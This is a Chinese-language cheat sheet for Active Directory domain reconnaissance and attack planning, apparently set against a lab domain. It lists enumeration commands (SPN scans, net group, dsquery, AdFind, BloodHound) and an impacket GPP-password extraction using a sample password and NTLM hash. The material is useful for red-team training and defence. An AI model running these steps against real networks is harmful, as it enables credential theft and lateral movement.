域内信息收集和攻击思路
目录
- 域渗透思路
- 域内信息搜集
- SPN信息
- DNS信息
- GPP凭证
- 域信任关系
- 域密码策略
- 域管理员
- 企业管理员
- 指定域⽤户
- 域内组
- 域⽤户SID和域SID
- 指定组的⽤户
- 指定主机本地组
- 所有域⽤户
- 域内所有主机
- 域内所有组
- 域控信息搜集
- 定位域控
- domain controller 主机
- 时间服务
- netdom⼯具
- dns服务
- nltest⼯具
- 端⼝服务(53、88、389)
- 域控收集
- 域⽤户信息
- 域主机信息
- 域内组信息
- 组织信息
- 分区信息
- 域内机器数
- 域内⽤户数
- 域管信息搜集
- 查看域管
- 定位域管
- PVEFindADUser
- AdFind
- 查看域控信息
- 查看在线主机
- 查看所有主机
- 查看所有⽤户
- 查看所有GPO
- NetSess
- ⾃动化信息收集
- ADExplorer
- BloodHound
域渗透思路
域内信息搜集
SPN信息
Kerberos认证过程使⽤SPN将服务实例与服务登录账户相关联。
如果要使⽤Kerberos协议来认证服务,那么必须正确配置SPN。
在域中的计算机上安装多个服务实例,则每个实例都必须具有⾃⼰的SPN。
如果客户端使⽤多个名称进⾏身份验证,则给定服务实例可以具有多个SPN。
在内⽹中SPN扫描通过查询向域控服务器执⾏服务发现,可以帮助识别正在运⾏重要服务的主机。
setspn -T 0day.org -q */*
DNS信息
ipconfig /all
net config workstation
GPP凭证
GPP组策略允许管理员使⽤嵌⼊式凭据创建域策略。
这些组策略存储在域控制器上的SYSVOL中。
意味着任何域⽤户都可以查看SYSVOL共享。
工具:https://github.com/outflanknl/Net-GPPPassword
proxychains impacket-Get-GPPPassword 0day/sqladmin:'admin!@#45'@192.168.3.142
proxychains impacket-Get-GPPPassword -hashes :518b98ad4178a53695dc997aa02d455c 0day/sqladmin@192.168.3.142
域信任关系
信任是域之间建⽴的⼀种关系,它使⼀个域中的⽤户可以通过另⼀个域中的域控进⾏身份验证。
也就是说,通过域之间的信任关系,可以⽅便的使⽤⼀个域⽤户去访问另⼀个域的资源。
nltest /domain_trusts
域密码策略
net accounts /domain
域管理员
net group "domain admins" /domain
企业管理员
net group "enterprise admins" /domain
指定域⽤户
net user /domain
net user jerry /domain
域内组
net group /domain
域⽤户SID和域SID
如⽤户的SID是:S-1-5-21-2189311154-2766837956-1982445477-520
则域SID则是去掉最后的520:S-1-5-21-2189311154-2766837956-1982445477
wmic useraccount where name="sqladmin" get sid
指定组的⽤户
net group "Help Desk" /domain
指定主机本地组
工具:https://github.com/outflanknl/Recon-AD
所有域⽤户
net user /domain
域内所有主机
net group "domain computers" /domain
域内所有组
net group /domain
域控信息搜集
定位域控
domain controller 主机
net group "domain controllers" /domain
时间服务
net time /domain
netdom⼯具
Netdom 是⼀个win⾃带命令⾏实⽤⼯具,可⽤于管理Windows 域。
netdom query pdc
dns服务
nslookup -qt=ns 0day.org
ipconfig /all
nltest⼯具
nltest /DCLIST:0day.org
端⼝服务(53、88、389)
portscan 192.168.3.0/24 53,88,389 none 1024
域控收集
域⽤户信息
dsquery user
域主机信息
dsquery computer
域内组信息
dsquery group
组织信息
dsquery ou
分区信息
dsquery partition
域内机器数
dsquery computer -limit 0 | dsget computer -dn
powershell (get-adcomputer -filter *).count
域内⽤户数
dsquery user -limit 0 | dsget user -dn
powershell (get-aduser -filter *).count
域管信息搜集
查看域管
net group "domain admins" /domain
定位域管
PVEFindADUser
链接:https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn
PVEFindADUser.exe -current
PVEFindADUser.exe -current 0day\sqladmin
AdFind
注意落地可能被查杀。
链接:https://joeware.net/freetools/tools/adfind/index.htm
查看域控信息
AdFind.exe -sc dclist
查看在线主机
AdFind.exe -sc computers_active name operatingSystem
查看所有主机
AdFind.exe -f "objectcategory=computer" name operatingSystem
查看所有⽤户
AdFind.exe -users name
查看所有GPO
AdFind.exe -sc gpodmp
NetSess
通过检索NetBIOS sessions记录,⽤于枚举指定的本地或远程计算机,从哪⾥登陆。
链接:http://www.joeware.net/freetools/tools/netsess/
NetSess.exe -h OWA2010SP3
⾃动化信息收集
ADExplorer
使⽤ADExplorer轻松导航AD数据库,定义收藏夹位置,查看对象属性,
⽆需打开对话框、编辑权限、查看 对象的模式,并执⾏复杂的搜索。
链接:https://learn.microsoft.com/enus/sysinternals/downloads/adexplorer
BloodHound
链接:https://github.com/BloodHoundAD/BloodHound
BloodHound将域内⽤户、计算机、组、Sessions、ACLs以及域内所有相关⽤户、组、计算机、登陆信
息、访问控制策略之间的关系更直观的展现在攻击者⾯前进⾏更便捷的分析域内情况,更快速的在域内
提升⾃⼰的权限。
使⽤BloodHound轻松识别⾼度复杂的攻击路径,轻松深⼊了解Active Directory环境中的权限关系。